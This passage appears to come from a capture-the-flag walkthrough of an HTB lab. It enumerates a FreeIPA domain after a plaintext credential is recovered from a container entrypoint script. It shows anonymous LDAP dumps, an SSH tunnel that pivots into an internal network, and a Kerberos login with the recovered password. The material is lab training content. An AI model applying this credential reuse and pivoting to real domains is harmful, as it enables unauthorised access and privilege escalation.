From the LinPEAS result, we know IPA is enabled on the target. FreeIPA is Red Hat's open-source Identity, Policy & Audit platform.
Think of it as an on-prem “Active Directory-for-Linux” bundle that combines:
| Component | Role in IPA |
|---|---|
| 389-DS | LDAP directory for user, group, host, sudo, HBAC data. |
| MIT Kerberos | Single-sign-on tickets (kinit, klist, etc.). |
| Dogtag CA | Optional certificate authority for host / service certs. |
| Bind DNS | Realm-aware DNS with dynamic updates. |
| SSSD | Client-side daemon that glues LDAP+Kerberos into NSS & PAM. |
| CLI / Web UI | ipa command and a web console for administration. |
So when a Linux host “joins” an IPA realm it gains:
- a host principal (host/<fqdn>@REALM) and a keytab in /etc/krb5.keytab;
- PAM/SSSD config so domain users can SSH or sudo with their realm creds;
- centralized sudo / HBAC / automount / cert policies.
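For context, the SSSD configuration such a join typically writes looks like the following (a hypothetical sketch inferred from this realm's settings, not the actual file from the box):

```ini
; /etc/sssd/sssd.conf (illustrative; as ipa-client-install would generate it)
[sssd]
domains = sorcery.htb
services = nss, pam, ssh, sudo

[domain/sorcery.htb]
id_provider = ipa
auth_provider = ipa
access_provider = ipa
ipa_domain = sorcery.htb
ipa_server = dc01.sorcery.htb
ipa_hostname = main.sorcery.htb
cache_credentials = True
krb5_store_password_if_offline = True
```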
According to the previous exfiltration from the Docker Registry:
# docker-entrypoint.sh
ipa-client-install \
--unattended \ # run non-interactively—no prompts
--principal donna_adams \ # bind to IPA using this user account
--password 3FEVPCT_c3xDH \ # password for that principal
--server dc01.sorcery.htb \ # specific IPA server to contact
--domain sorcery.htb \ # DNS domain / Kerberos realm
--no-ntp \ # don’t configure NTP (time sync)
--force-join \ # join even if already enrolled
--mkhomedir # create home directories on first login
It initiates the IPA installation:
- Clock check (unless --no-ntp): Kerberos needs clocks within 5 min.
- Kerberos authentication: uses the supplied principal/password to get a Ticket-Granting Ticket (TGT).
- Host entry creation / update: through LDAP it creates (or updates) an object like host/main.sorcery.htb with SSH keys, OS, etc.
- Keytab retrieval: downloads a keytab containing keys for host/[email protected] → stored in /etc/krb5.keytab.
- Configure SSSD, NSS, PAM: writes /etc/sssd/sssd.conf, krb5.conf, sudo/HBAC rules, pam_mkhomedir.
- Service restart: starts sssd so logins are realm-aware immediately.
ipa-client-install joined the box to the SORCERY.HTB realm using donna_adams / 3FEVPCT_c3xDH. The plaintext password is now our foothold into Free IPA / Kerberos, letting us enumerate or escalate control over the entire domain.
Domain Enumeration
From previous LinPEAS enumeration, we see /etc/ipa/default.conf:
[global]
basedn = dc=sorcery,dc=htb
realm = SORCERY.HTB
domain = sorcery.htb
server = dc01.sorcery.htb
host = main.sorcery.htb
xmlrpc_uri = https://dc01.sorcery.htb/ipa/xml
enable_ra = True
Anonymous LDAP Access
We can try an anonymous LDAP bind (though we already have credentials):
ldapsearch -x -H ldap://dc01.sorcery.htb -b "dc=sorcery,dc=htb"
It reveals the full FreeIPA structure:
# sorcery.htb
dn: dc=sorcery,dc=htb
objectClass: top
objectClass: domain
objectClass: pilotObject
objectClass: domainRelatedObject
objectClass: nisDomainObject
dc: sorcery
info: IPA V2.0
nisDomain: sorcery.htb
associatedDomain: sorcery.htb
# accounts, sorcery.htb
dn: cn=accounts,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: accounts
# users, accounts, sorcery.htb
dn: cn=users,cn=accounts,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: users
# groups, accounts, sorcery.htb
dn: cn=groups,cn=accounts,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: groups
# services, accounts, sorcery.htb
dn: cn=services,cn=accounts,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: services
# computers, accounts, sorcery.htb
dn: cn=computers,cn=accounts,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: computers
# hostgroups, accounts, sorcery.htb
dn: cn=hostgroups,cn=accounts,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: hostgroups
# ipservices, accounts, sorcery.htb
dn: cn=ipservices,cn=accounts,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: ipservices
# alt, sorcery.htb
dn: cn=alt,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: alt
# ng, alt, sorcery.htb
dn: cn=ng,cn=alt,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: ng
# automount, sorcery.htb
dn: cn=automount,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: automount
# default, automount, sorcery.htb
dn: cn=default,cn=automount,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: default
# auto.master, default, automount, sorcery.htb
dn: automountmapname=auto.master,cn=default,cn=automount,dc=sorcery,dc=htb
objectClass: automountMap
objectClass: top
automountMapName: auto.master
# auto.direct, default, automount, sorcery.htb
dn: automountmapname=auto.direct,cn=default,cn=automount,dc=sorcery,dc=htb
objectClass: automountMap
objectClass: top
automountMapName: auto.direct
# /- auto.direct, auto.master, default, automount, sorcery.htb
dn: description=/- auto.direct,automountmapname=auto.master,cn=default,cn=auto
mount,dc=sorcery,dc=htb
objectClass: automount
objectClass: top
automountKey: /-
automountInformation: auto.direct
description: /- auto.direct
# hbac, sorcery.htb
dn: cn=hbac,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: hbac
# hbacservices, hbac, sorcery.htb
dn: cn=hbacservices,cn=hbac,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: hbacservices
# hbacservicegroups, hbac, sorcery.htb
dn: cn=hbacservicegroups,cn=hbac,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: hbacservicegroups
# sudo, sorcery.htb
dn: cn=sudo,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: sudo
# sudocmds, sudo, sorcery.htb
dn: cn=sudocmds,cn=sudo,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: sudocmds
# sudocmdgroups, sudo, sorcery.htb
dn: cn=sudocmdgroups,cn=sudo,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: sudocmdgroups
# sudorules, sudo, sorcery.htb
dn: cn=sudorules,cn=sudo,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: sudorules
# etc, sorcery.htb
dn: cn=etc,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: etc
# locations, etc, sorcery.htb
dn: cn=locations,cn=etc,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: locations
# sysaccounts, etc, sorcery.htb
dn: cn=sysaccounts,cn=etc,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: sysaccounts
# ipa, etc, sorcery.htb
dn: cn=ipa,cn=etc,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: ipa
# replicas, ipa, etc, sorcery.htb
dn: cn=replicas,cn=ipa,cn=etc,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: replicas
# dna, ipa, etc, sorcery.htb
dn: cn=dna,cn=ipa,cn=etc,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: dna
# posix-ids, dna, ipa, etc, sorcery.htb
dn: cn=posix-ids,cn=dna,cn=ipa,cn=etc,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: posix-ids
# subordinate-ids, dna, ipa, etc, sorcery.htb
dn: cn=subordinate-ids,cn=dna,cn=ipa,cn=etc,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: subordinate-ids
# ca_renewal, ipa, etc, sorcery.htb
dn: cn=ca_renewal,cn=ipa,cn=etc,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: ca_renewal
# certificates, ipa, etc, sorcery.htb
dn: cn=certificates,cn=ipa,cn=etc,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: certificates
# custodia, ipa, etc, sorcery.htb
dn: cn=custodia,cn=ipa,cn=etc,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: custodia
# dogtag, custodia, ipa, etc, sorcery.htb
dn: cn=dogtag,cn=custodia,cn=ipa,cn=etc,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: dogtag
# s4u2proxy, etc, sorcery.htb
dn: cn=s4u2proxy,cn=etc,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: s4u2proxy
# admin, users, accounts, sorcery.htb
dn: uid=admin,cn=users,cn=accounts,dc=sorcery,dc=htb
objectClass: top
objectClass: person
objectClass: posixaccount
objectClass: krbprincipalaux
objectClass: krbticketpolicyaux
objectClass: inetuser
objectClass: ipaobject
objectClass: ipasshuser
objectClass: ipaSshGroupOfPubKeys
objectClass: ipaNTUserAttrs
uid: admin
cn: Administrator
sn: Administrator
uidNumber: 1638400000
gidNumber: 1638400000
homeDirectory: /home/admin
loginShell: /bin/bash
gecos: Administrator
ipaNTSecurityIdentifier: S-1-5-21-820725746-4072777037-1046661441-500
# admins, groups, accounts, sorcery.htb
dn: cn=admins,cn=groups,cn=accounts,dc=sorcery,dc=htb
objectClass: top
objectClass: groupofnames
objectClass: posixgroup
objectClass: ipausergroup
objectClass: ipaobject
objectClass: nestedGroup
objectClass: ipaNTGroupAttrs
cn: admins
description: Account administrators group
gidNumber: 1638400000
ipaUniqueID: 30051a92-96eb-11ef-a395-0242ac170002
ipaNTSecurityIdentifier: S-1-5-21-820725746-4072777037-1046661441-512
# ipausers, groups, accounts, sorcery.htb
dn: cn=ipausers,cn=groups,cn=accounts,dc=sorcery,dc=htb
objectClass: top
objectClass: groupofnames
objectClass: nestedgroup
objectClass: ipausergroup
objectClass: ipaobject
description: Default group for all users
cn: ipausers
ipaUniqueID: 300541ac-96eb-11ef-8324-0242ac170002
# editors, groups, accounts, sorcery.htb
dn: cn=editors,cn=groups,cn=accounts,dc=sorcery,dc=htb
objectClass: top
objectClass: groupofnames
objectClass: posixgroup
objectClass: ipausergroup
objectClass: ipaobject
objectClass: nestedGroup
objectClass: ipantgroupattrs
gidNumber: 1638400002
description: Limited admins who can edit other users
cn: editors
ipaUniqueID: 30055df4-96eb-11ef-9a7a-0242ac170002
ipaNTSecurityIdentifier: S-1-5-21-820725746-4072777037-1046661441-1002
# ipaConfig, etc, sorcery.htb
dn: cn=ipaConfig,cn=etc,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
objectClass: ipaGuiConfig
objectClass: ipaConfigObject
objectClass: ipaUserAuthTypeClass
objectClass: ipaNameResolutionData
cn: ipaConfig
# cosTemplates, accounts, sorcery.htb
dn: cn=cosTemplates,cn=accounts,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: cosTemplates
# selinux, sorcery.htb
dn: cn=selinux,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: selinux
# usermap, selinux, sorcery.htb
dn: cn=usermap,cn=selinux,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: usermap
# ranges, etc, sorcery.htb
dn: cn=ranges,cn=etc,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: ranges
# ca, sorcery.htb
dn: cn=ca,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: ca
# certprofiles, ca, sorcery.htb
dn: cn=certprofiles,cn=ca,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: certprofiles
# caacls, ca, sorcery.htb
dn: cn=caacls,cn=ca,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: caacls
# cas, ca, sorcery.htb
dn: cn=cas,cn=ca,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: cas
# roles, accounts, sorcery.htb
dn: cn=roles,cn=accounts,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: roles
# pbac, sorcery.htb
dn: cn=pbac,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: pbac
# privileges, pbac, sorcery.htb
dn: cn=privileges,cn=pbac,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: privileges
# permissions, pbac, sorcery.htb
dn: cn=permissions,cn=pbac,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: permissions
# virtual operations, etc, sorcery.htb
dn: cn=virtual operations,cn=etc,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: virtual operations
# Managed Entries, etc, sorcery.htb
dn: cn=Managed Entries,cn=etc,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: Managed Entries
# Templates, Managed Entries, etc, sorcery.htb
dn: cn=Templates,cn=Managed Entries,cn=etc,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: Templates
# Definitions, Managed Entries, etc, sorcery.htb
dn: cn=Definitions,cn=Managed Entries,cn=etc,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: Definitions
# automember, etc, sorcery.htb
dn: cn=automember,cn=etc,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: automember
# topology, ipa, etc, sorcery.htb
dn: cn=topology,cn=ipa,cn=etc,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: topology
# Domain Level, ipa, etc, sorcery.htb
dn: cn=Domain Level,cn=ipa,cn=etc,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
objectClass: ipaDomainLevelConfig
objectClass: ipaConfigObject
cn: Domain Level
# kerberos, sorcery.htb
dn: cn=kerberos,dc=sorcery,dc=htb
objectClass: krbContainer
objectClass: top
cn: kerberos
# SORCERY.HTB, kerberos, sorcery.htb
dn: cn=SORCERY.HTB,cn=kerberos,dc=sorcery,dc=htb
cn: SORCERY.HTB
objectClass: top
objectClass: krbrealmcontainer
objectClass: krbticketpolicyaux
# sig/dc01.sorcery.htb, custodia, ipa, etc, sorcery.htb
dn: cn=sig/dc01.sorcery.htb,cn=custodia,cn=ipa,cn=etc,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: ipaKeyPolicy
objectClass: ipaPublicKeyObject
objectClass: groupOfPrincipals
objectClass: top
cn: sig/dc01.sorcery.htb
# enc/dc01.sorcery.htb, custodia, ipa, etc, sorcery.htb
dn: cn=enc/dc01.sorcery.htb,cn=custodia,cn=ipa,cn=etc,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: ipaKeyPolicy
objectClass: ipaPublicKeyObject
objectClass: groupOfPrincipals
objectClass: top
cn: enc/dc01.sorcery.htb
# CAcert, ipa, etc, sorcery.htb
dn: cn=CAcert,cn=ipa,cn=etc,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: pkiCA
objectClass: top
cn: CAcert
cACertificate;binary:: MIIESjCCArKgAwIBAgIBATANBgkqhkiG9w0BAQsFADA2MRQwEgYDVQQ
...
# SORCERY.HTB IPA CA, certificates, ipa, etc, sorcery.htb
dn: cn=SORCERY.HTB IPA CA,cn=certificates,cn=ipa,cn=etc,dc=sorcery,dc=htb
objectClass: ipaCertificate
objectClass: pkiCA
objectClass: ipaKeyPolicy
objectClass: top
cn: SORCERY.HTB IPA CA
ipaCertSubject: CN=Certificate Authority,O=SORCERY.HTB
ipaCertIssuerSerial: CN=Certificate Authority,O=SORCERY.HTB;1
ipaPublicKey:: MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAyF/f65xt1aLvODd/gqa
n2t30L5YUA7WGnKpZdRyFaRmHGvKUFZ86M65a1KM2rrIPdz1lwsYtwUjOc+49QgAuxYfHWATopM8I
...
ipaKeyTrust: trusted
ipaKeyExtUsage: 1.3.6.1.5.5.7.3.2
ipaKeyExtUsage: 1.3.6.1.5.5.7.3.1
ipaKeyExtUsage: 1.3.6.1.5.5.7.3.4
ipaKeyExtUsage: 1.3.6.1.5.5.7.3.3
ipaConfigString: ipaCa
ipaConfigString: compatCA
# sig/dc01.sorcery.htb, dogtag, custodia, ipa, etc, sorcery.htb
dn: cn=sig/dc01.sorcery.htb,cn=dogtag,cn=custodia,cn=ipa,cn=etc,dc=sorcery,dc=
htb
objectClass: nsContainer
objectClass: ipaKeyPolicy
objectClass: ipaPublicKeyObject
objectClass: groupOfPrincipals
objectClass: top
cn: sig/dc01.sorcery.htb
# enc/dc01.sorcery.htb, dogtag, custodia, ipa, etc, sorcery.htb
dn: cn=enc/dc01.sorcery.htb,cn=dogtag,cn=custodia,cn=ipa,cn=etc,dc=sorcery,dc=
htb
objectClass: nsContainer
objectClass: ipaKeyPolicy
objectClass: ipaPublicKeyObject
objectClass: groupOfPrincipals
objectClass: top
cn: enc/dc01.sorcery.htb
# anonymous-limits, etc, sorcery.htb
dn: cn=anonymous-limits,cn=etc,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: anonymous-limits
# Kerberos Service Password Policy, SORCERY.HTB, kerberos, sorcery.htb
dn: cn=Kerberos Service Password Policy,cn=SORCERY.HTB,cn=kerberos,dc=sorcery,
dc=htb
objectClass: nsContainer
objectClass: top
cn: Kerberos Service Password Policy
# cosTemplates, computers, accounts, sorcery.htb
dn: cn=cosTemplates,cn=computers,cn=accounts,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: cosTemplates
# cosTemplates, services, accounts, sorcery.htb
dn: cn=cosTemplates,cn=services,cn=accounts,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: cosTemplates
# cosTemplates, SORCERY.HTB, kerberos, sorcery.htb
dn: cn=cosTemplates,cn=SORCERY.HTB,cn=kerberos,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: cosTemplates
# Default Password Policy, cosTemplates, SORCERY.HTB, kerberos, sorcery.htb
dn: cn=Default Password Policy,cn=cosTemplates,cn=SORCERY.HTB,cn=kerberos,dc=s
orcery,dc=htb
objectClass: top
objectClass: cosTemplate
objectClass: extensibleObject
objectClass: krbContainer
cn: Default Password Policy
# cosTemplates, sysaccounts, etc, sorcery.htb
dn: cn=cosTemplates,cn=sysaccounts,cn=etc,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: cosTemplates
# profile, sorcery.htb
dn: ou=profile,dc=sorcery,dc=htb
objectClass: top
objectClass: organizationalUnit
ou: profiles
ou: profile
# default, profile, sorcery.htb
dn: cn=default,ou=profile,dc=sorcery,dc=htb
objectClass: top
objectClass: DUAConfigProfile
defaultServerList: dc01.sorcery.htb
defaultSearchBase: dc=sorcery,dc=htb
authenticationMethod: none
searchTimeLimit: 15
cn: default
serviceSearchDescriptor: passwd:cn=users,cn=accounts,dc=sorcery,dc=htb
serviceSearchDescriptor: group:cn=groups,cn=compat,dc=sorcery,dc=htb
bindTimeLimit: 5
objectclassMap: shadow:shadowAccount=posixAccount
followReferrals: TRUE
# provisioning, sorcery.htb
dn: cn=provisioning,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: provisioning
# accounts, provisioning, sorcery.htb
dn: cn=accounts,cn=provisioning,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: accounts
# staged users, accounts, provisioning, sorcery.htb
dn: cn=staged users,cn=accounts,cn=provisioning,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: staged users
# deleted users, accounts, provisioning, sorcery.htb
dn: cn=deleted users,cn=accounts,cn=provisioning,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: deleted users
# retrieve certificate, virtual operations, etc, sorcery.htb
dn: cn=retrieve certificate,cn=virtual operations,cn=etc,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: retrieve certificate
# request certificate, virtual operations, etc, sorcery.htb
dn: cn=request certificate,cn=virtual operations,cn=etc,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: request certificate
# request certificate different host, virtual operations, etc, sorcery.htb
dn: cn=request certificate different host,cn=virtual operations,cn=etc,dc=sorc
ery,dc=htb
objectClass: top
objectClass: nsContainer
cn: request certificate different host
# certificate status, virtual operations, etc, sorcery.htb
dn: cn=certificate status,cn=virtual operations,cn=etc,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: certificate status
# revoke certificate, virtual operations, etc, sorcery.htb
dn: cn=revoke certificate,cn=virtual operations,cn=etc,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: revoke certificate
# certificate remove hold, virtual operations, etc, sorcery.htb
dn: cn=certificate remove hold,cn=virtual operations,cn=etc,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: certificate remove hold
# request certificate ignore caacl, virtual operations, etc, sorcery.htb
dn: cn=request certificate ignore caacl,cn=virtual operations,cn=etc,dc=sorcer
y,dc=htb
objectClass: top
objectClass: nsContainer
cn: request certificate ignore caacl
# idp, sorcery.htb
dn: cn=idp,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: idp
# otp, sorcery.htb
dn: cn=otp,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: otp
# radiusproxy, sorcery.htb
dn: cn=radiusproxy,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: radiusproxy
# Realm Domains, ipa, etc, sorcery.htb
dn: cn=Realm Domains,cn=ipa,cn=etc,dc=sorcery,dc=htb
objectClass: domainRelatedObject
objectClass: nsContainer
objectClass: top
cn: Realm Domains
# trust admins, groups, accounts, sorcery.htb
dn: cn=trust admins,cn=groups,cn=accounts,dc=sorcery,dc=htb
objectClass: top
objectClass: groupofnames
objectClass: ipausergroup
objectClass: nestedgroup
objectClass: ipaobject
cn: trust admins
description: Trusts administrators group
ipaUniqueID: 9534bbe8-96eb-11ef-8555-0242ac170002
# trusts, sorcery.htb
dn: cn=trusts,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: trusts
# views, accounts, sorcery.htb
dn: cn=views,cn=accounts,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: views
# certmap, sorcery.htb
dn: cn=certmap,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
objectClass: ipaCertMapConfigObject
cn: certmap
# certmaprules, certmap, sorcery.htb
dn: cn=certmaprules,cn=certmap,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: certmaprules
# passkeyconfig, etc, sorcery.htb
dn: cn=passkeyconfig,cn=etc,dc=sorcery,dc=htb
objectClass: top
objectClass: nscontainer
objectClass: ipaPasskeyConfigObject
cn: passkeyconfig
# subids, accounts, sorcery.htb
dn: cn=subids,cn=accounts,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: subids
# ad, trusts, sorcery.htb
dn: cn=ad,cn=trusts,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: cn
cn: ad
# ad, etc, sorcery.htb
dn: cn=ad,cn=etc,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: cn
cn: ad
# sorcery.htb, ad, etc, sorcery.htb
dn: cn=sorcery.htb,cn=ad,cn=etc,dc=sorcery,dc=htb
objectClass: ipaNTDomainAttrs
objectClass: nsContainer
objectClass: top
cn: sorcery.htb
# Default SMB Group, groups, accounts, sorcery.htb
dn: cn=Default SMB Group,cn=groups,cn=accounts,dc=sorcery,dc=htb
cn: Default SMB Group
description: Fallback group for primary group RID, do not add users to this gr
oup
objectClass: top
objectClass: ipaobject
objectClass: posixgroup
objectClass: ipantgroupattrs
ipaUniqueID: 9dd5dd0e-96eb-11ef-9b17-0242ac170002
gidNumber: 1638400001
ipaNTSecurityIdentifier: S-1-5-21-820725746-4072777037-1046661441-1001
# donna_adams, users, accounts, sorcery.htb
dn: uid=donna_adams,cn=users,cn=accounts,dc=sorcery,dc=htb
givenName: donna
sn: adams
uid: donna_adams
cn: donna adams
displayName: donna adams
initials: da
gecos: donna adams
objectClass: top
objectClass: person
objectClass: organizationalperson
objectClass: inetorgperson
objectClass: inetuser
objectClass: posixaccount
objectClass: krbprincipalaux
objectClass: krbticketpolicyaux
objectClass: ipaobject
objectClass: ipasshuser
objectClass: ipaSshGroupOfPubKeys
objectClass: mepOriginEntry
objectClass: ipantuserattrs
loginShell: /bin/sh
homeDirectory: /home/donna_adams
uidNumber: 1638400003
gidNumber: 1638400003
ipaNTSecurityIdentifier: S-1-5-21-820725746-4072777037-1046661441-1003
# donna_adams, groups, accounts, sorcery.htb
dn: cn=donna_adams,cn=groups,cn=accounts,dc=sorcery,dc=htb
objectClass: posixgroup
objectClass: ipaobject
objectClass: mepManagedEntry
objectClass: top
cn: donna_adams
gidNumber: 1638400003
description: User private group for donna_adams
mepManagedBy: uid=donna_adams,cn=users,cn=accounts,dc=sorcery,dc=htb
ipaUniqueID: c61201ee-96eb-11ef-ace5-0242ac170002
# ash_winter, users, accounts, sorcery.htb
dn: uid=ash_winter,cn=users,cn=accounts,dc=sorcery,dc=htb
givenName: ash
sn: winter
uid: ash_winter
cn: ash winter
displayName: ash winter
initials: aw
gecos: ash winter
objectClass: top
objectClass: person
objectClass: organizationalperson
objectClass: inetorgperson
objectClass: inetuser
objectClass: posixaccount
objectClass: krbprincipalaux
objectClass: krbticketpolicyaux
objectClass: ipaobject
objectClass: ipasshuser
objectClass: ipaSshGroupOfPubKeys
objectClass: mepOriginEntry
objectClass: ipantuserattrs
loginShell: /bin/sh
homeDirectory: /home/ash_winter
uidNumber: 1638400004
gidNumber: 1638400004
ipaNTSecurityIdentifier: S-1-5-21-820725746-4072777037-1046661441-1004
# ash_winter, groups, accounts, sorcery.htb
dn: cn=ash_winter,cn=groups,cn=accounts,dc=sorcery,dc=htb
objectClass: posixgroup
objectClass: ipaobject
objectClass: mepManagedEntry
objectClass: top
cn: ash_winter
gidNumber: 1638400004
description: User private group for ash_winter
mepManagedBy: uid=ash_winter,cn=users,cn=accounts,dc=sorcery,dc=htb
ipaUniqueID: c86a5860-96eb-11ef-9f47-0242ac170002
# sysadmins, groups, accounts, sorcery.htb
dn: cn=sysadmins,cn=groups,cn=accounts,dc=sorcery,dc=htb
cn: sysadmins
objectClass: top
objectClass: groupofnames
objectClass: nestedgroup
objectClass: ipausergroup
objectClass: ipaobject
objectClass: posixgroup
objectClass: ipantgroupattrs
ipaUniqueID: d038b410-96eb-11ef-ace5-0242ac170002
gidNumber: 1638400005
ipaNTSecurityIdentifier: S-1-5-21-820725746-4072777037-1046661441-1005
The search base dc=sorcery,dc=htb contains every IPA subtree (users, groups, hosts, sudo, HBAC), confirming the box is joined to a FreeIPA realm named SORCERY.HTB whose LDAP/Kerberos single-sign-on backend is reachable at dc01.sorcery.htb.
The dump shows real user entries:
| uid | uidNumber | Private group | Notes |
|---|---|---|---|
| donna_adams | 1638400003 | cn=donna_adams | The owned user. |
| ash_winter | 1638400004 | cn=ash_winter | Another normal user. |
| admin | 1638400000 | — | Built-in realm-wide administrator. |
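A dump this size is easier to triage by reducing it to the interesting attributes. A minimal sketch, run against an inlined excerpt of the ldapsearch output above (the temp-file path and the extraction logic are mine, not part of the original workflow):

```shell
# Reproduce two user entries from the dump, then pull out
# uid, uidNumber and the RID (last field of the NT SID).
cat > /tmp/users.ldif <<'EOF'
uid: donna_adams
uidNumber: 1638400003
ipaNTSecurityIdentifier: S-1-5-21-820725746-4072777037-1046661441-1003
uid: ash_winter
uidNumber: 1638400004
ipaNTSecurityIdentifier: S-1-5-21-820725746-4072777037-1046661441-1004
EOF
awk -F': ' '
  $1 == "uid"       { u = $2 }
  $1 == "uidNumber" { n = $2 }
  $1 == "ipaNTSecurityIdentifier" {
      k = split($2, p, "-")          # RID is the last dash-separated field
      print u, n, "RID=" p[k]
  }' /tmp/users.ldif
```

Note that the RID suffix tracks the POSIX uidNumber (1638400003 ↔ RID 1003), which is how the SID column in the table above lines up with each account.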
FreeIPA Web UI
We can pivot to the browser-based control panel that every IPA server exposes.
| URL | Protocol | Notes |
|---|---|---|
| https://dc01.sorcery.htb/ipa/ui/ | HTTPS (9443 if port-mapped in Docker; otherwise default 443) | Uses the same Kerberos/LDAP backend; self-signed CA issued by SORCERY.HTB IPA CA. |
Check /etc/hosts:
127.0.0.1 localhost main.sorcery.htb sorcery sorcery.htb
127.0.1.1 ubuntu-2404
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
172.23.0.2 dc01.sorcery.htb
dc01.sorcery.htb lives on the internal 172.23.0.0/24 Docker-bridge network; the address is only routable from the target host main.sorcery.htb.
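The routability claim can be sanity-checked with plain shell string handling; this is a toy helper of my own, not part of the original workflow, and it only handles /24 networks:

```shell
# Return 0 iff $1 falls inside the /24 whose network address is $2.
# For a /24 the first three octets must match exactly.
in_subnet24() {
  local ip=$1 net=$2
  [ "${ip%.*}" = "${net%.*}" ]
}

in_subnet24 172.23.0.2    172.23.0.0 && echo "dc01 is on the bridge network"
in_subnet24 10.129.113.32 172.23.0.0 || echo "our attack box is not"
```

So the container's address is reachable only from a host that sits on that bridge, which is why the SSH tunnel below is needed.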
Do a quick nmap scan:
PORT STATE SERVICE
80/tcp open http
88/tcp open kerberos
389/tcp open ldap
443/tcp open https
464/tcp open kpasswd
636/tcp open ldaps
749/tcp open kerberos-adm
So we need to forward the web ports (443 and 80) out:
sudo ssh \
-L 80:172.23.0.2:80 \
-L 443:172.23.0.2:443 \
[email protected]
Open /etc/hosts to add:
127.0.0.1 dc01.sorcery.htb
Now we can browse https://dc01.sorcery.htb/ipa/ui/ through the tunnel and log in as donna_adams:

Full access.
From here we can click around and find that the logged-in user (donna_adams) can modify the password and certificate of another user, ash_winter, which we can also uncover with the following command-line enumeration.
IPA Enum
Try Kerberos login with the retrieved account:
rebecca_smith@main:/dev/shm$ kinit donna_adams
Password for [email protected]:
rebecca_smith@main:/dev/shm$ klist
